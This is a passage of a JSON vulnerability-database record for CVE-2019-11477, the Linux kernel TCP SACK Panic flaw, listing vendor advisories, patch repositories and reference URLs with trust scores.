        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191489 - security advisory"
      },
      {
        "title": "Red Hat: Important: redhat-virtualization-host security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191699 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191483 - security advisory"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2019-11477"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2019-1222",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1222"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-12] linux-hardened: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-12"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2019-1222",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1222"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-15] linux-zen: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-15"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-14] linux-lts: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-14"
      },
      {
        "title": "Arch Linux Advisories: [ASA-201906-13] linux: denial of service",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201906-13"
      },
      {
        "title": "IBM: Security Bulletin: Multiple Vulnerabilities in the Linux kernel affect the IBM FlashSystem models 840 and 900",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b0e404260719b6ae04a48fa01fe4ff1d"
      },
      {
        "title": "IBM: Security Bulletin: Multiple Vulnerabilities in the Linux kernel affect the IBM FlashSystem models V840 and V9000",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=17e4e6718a6d3a42ddb3642e1aa88aaf"
      },
      {
        "title": "Huawei Security Advisories: Security Advisory - Integer Overflow Vulnerability in the Linux Kernel (SACK Panic)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=huawei_security_advisories\u0026qid=a0ea5bac8e90e20896758ffe948339eb"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM MQ Appliance is affected by kernel vulnerabilities (CVE-2019-11479, CVE-2019-11478 and CVE-2019-11477)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3abb37d34c3aab5be030484842a197cf"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel as used by IBM QRadar SIEM is vulnerable to Denial of Service(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac66c3446fcbed558afc45a4f11875b9"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel as used in IBM QRadar Network Packet Capture is vulnerable to denial of service (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d4c7bbb6295709432116ceed6c8665d0"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by Linux kernel vulnerabilities (CVE-2019-11479, CVE-2019-11478, CVE-2019-11477)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bae5fea992c13f587f4c457e2320189d"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Cloud Kubernetes Service is affected by Linux Kernel security vulnerabilities (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c19eb1501fe75f4801786c3ecf1bdfcd"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vulnerabilities in kernel affect Power Hardware Management Console (CVE-2019-11479,CVE-2019-11477 and CVE-2019-11478)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1eb240b9222a3f8a10e0a63fa47e7f24"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security QRadar Packet Capture is vulnerable to Denial of Service (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-3896)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1282c74cfb8f7d86371051c0a3c9e604"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b013e0ae6345849ef39c81d52c9d45cf"
      },
      {
        "title": "Citrix Security Bulletins: Citrix SD-WAN Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=fa8566afabfba193549f3f15c0c81ff5"
      },
      {
        "title": "Debian CVElist Bug Report Logs: linux-image-4.19.0-4-amd64: CVE-2019-11815",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=877a1ae1b4d7402bac3b3a0c44e3253b"
      },
      {
        "title": "IBM: Security Bulletin: Vulnerabilities have been identified in OpenSSL and the Kernel shipped with the DS8000 Hardware Management Console (HMC)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=423d1da688755122eb2591196e4cc160"
      },
      {
        "title": "Debian Security Advisories: DSA-4465-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1a396329c4647adcc53e47cd56d6ddad"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2019",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=767e8ff3a913d6c9b177c63c24420933"
      },
      {
        "title": "Fortinet Security Advisories: TCP SACK panic attack- Linux Kernel Vulnerabilities- CVE-2019-11477, CVE-2019-11478 \u0026 CVE-2019-11479",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=fortinet_security_advisories\u0026qid=fg-ir-19-180"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Netezza Host Management is affected by the vulnerabilities known as Intel Microarchitectural Data Sampling (MDS) and other Kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9b0697bf711f12539432f3ec83b074bf"
      },
      {
        "title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (February 2020v2)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9474066c07efdb84c4612586270078f"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel vulnerabilities affect IBM Spectrum Protect Plus CVE-2019-10140, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-13233, CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-15090, CVE-2019-15807, CVE-2019-15925",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9cd8f6d11c68af77f2f2bd27ca37bed"
      },
      {
        "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426"
      },
      {
        "title": "Palo Alto Networks Security Advisory: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=e4153a9b76a5eea42e73bc20e968375b"
      },
      {
        "title": "Palo Alto Networks Security Advisory: PAN-SA-2019-0013 Information about TCP SACK Panic Findings in PAN-OS",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=57ed3d9f467472d630cb7b7dfca89570"
      },
      {
        "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u00e2\u20ac\u201c Release 1801-za",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8710e4e233940f7482a6adad4643a7a8"
      },
      {
        "title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "linux_hardening_arsenal",
        "trust": 0.1,
        "url": "https://github.com/lucassbeiler/linux_hardening_arsenal "
      },
      {
        "title": "tcp_sack_fix",
        "trust": 0.1,
        "url": "https://github.com/sonoransun/tcp_sack_fix "
      },
      {
        "title": "kpatch-sack-panic",
        "trust": 0.1,
        "url": "https://github.com/fengjian/kpatch-sack-panic "
      },
      {
        "title": "FFFFM",
        "trust": 0.1,
        "url": "https://github.com/misanthropos/ffffm "
      },
      {
        "title": "docLinux",
        "trust": 0.1,
        "url": "https://github.com/hightemp/doclinux "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11477"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-681"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-190",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-143127"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.6,
        "url": "https://access.redhat.com/security/vulnerabilities/tcpsack"
      },
      {
        "trust": 2.5,
        "url": "https://github.com/netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md"
      },
      {
        "trust": 2.5,
        "url": "https://www.synology.com/security/advisory/synology_sa_19_28"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/153346/kernel-live-patch-security-notice-lsn-0052-1.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
      },
      {
        "trust": 2.3,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 1.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/sackpanic"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:1602"
      },
      {
        "trust": 1.8,
        "url": "https://access.redhat.com/errata/rhsa-2019:1699"
      },
      {
        "trust": 1.7,
        "url": "https://www.kb.cert.org/vuls/id/905115"
      },
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2020-010.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20191225-01-kernel-en"
      },
      {
        "trust": 1.7,
        "url": "http://www.vmware.com/security/advisories/vmsa-2019-0010.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-462066.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44193"
      },
      {
        "trust": 1.7,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2019-0006"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20190625-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://support.f5.com/csp/article/k78234183"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=3b4929f65b0d8249f19a50245cd88ed1a2f78cff"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/20/3"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/06/28/2"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/3"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/07/06/4"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/24/1"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/29/3"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1594"
      },
      {
        "trust": 1.6,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10287"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2019-11477"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11477"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11478"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-5599"
      },
      {
        "trust": 0.8,
        "url": "https://security.archlinux.org/cve-2019-11477https://security.archlinux.org/cve-2019-11478https://security.archlinux.org/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/8066-security-advisory-41"
      },
      {
        "trust": 0.8,
        "url": "https://coreos.com/releases/"
      },
      {
        "trust": 0.8,
        "url": "https://security-tracker.debian.org/tracker/cve-2019-11477https://security-tracker.debian.org/tracker/cve-2019-11478https://security-tracker.debian.org/tracker/cve-2019-11479"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/c/suse-addresses-the-sack-panic-tcp-remote-denial-of-service-attacks/https://www.suse.com/support/kb/doc/?id=7023928"
      },
      {
        "trust": 0.8,
        "url": "https://usn.ubuntu.com/4017-1/https://usn.ubuntu.com/4017-2/"
      },
      {
        "trust": 0.7,
        "url": "https://usn.ubuntu.com/4017-1"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:1488"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20191204-01-kernel-cn"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1490"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1489"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1487"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1486"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1485"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1484"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1483"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1482"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1481"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1480"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2019:1479"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1719123"
      },
      {
        "trust": 0.6,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=832d11c5cd076abc0aa1eaf7be96c81d1a59ce41"
      },
      {
        "trust": 0.6,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4017-2"
      },
      {
        "trust": 0.6,
        "url": "https://support.citrix.com/article/ctx256725"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191530-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191529-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191532-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191536-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284766"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284760"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284772"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284778"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1284784"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191550-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191535-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191534-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191533-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191527-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914089-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191581-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191588-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://fortiguard.com/psirt/fg-ir-19-180"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-v5-is-impacted-by-a-denial-of-service-vulnerability-in-linux-kernel-cve-2019-11477/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4528/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4316/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1171528"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20191225-01-kernel-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0736/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153329/linux-freebsd-tcp-based-denial-of-service.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1137796"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/security-alerts/cpujan2020verbose.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2155/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0342/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/3517185"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-19-253-03"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-denial-of-service-via-tcp-sack-low-mss-panic-29543"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-29592"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4255/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2231/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2171/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/asb-2019.0178.3/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-has-announced-a-release-for-ibm-security-identity-governance-and-intelligence-in-response-to-security-vulnerability-cve-2019-11479-cve-2019-11478-cve-2019-11477/"
      },
      {
        "trust": 0.6,
        "url": "https://www.securityfocus.com/bid/108801"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integrated-management-module-ii-imm2-is-affected-by-vulnerabilities-in-tcp-cve-2019-11477-cve-2019-11478-cve-2019-11479/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3564/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bootable-media-creator-bomc-is-affected-by-vulnerabilities-in-the-kernel/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-11479"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11479"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-11478"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10287"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.18.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.18.0-1018.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1008.8"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1041.43~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1048.55"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1115.121"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1034.36~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1043.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-52.56"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.18.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1055.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1111.120"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1015.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1020.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-52.56~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1036.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.18.0-1020.20~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-151.178"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.18.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1008.8"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1034.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-17.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1041.43"
      },
      {
        "trust": 0.1,
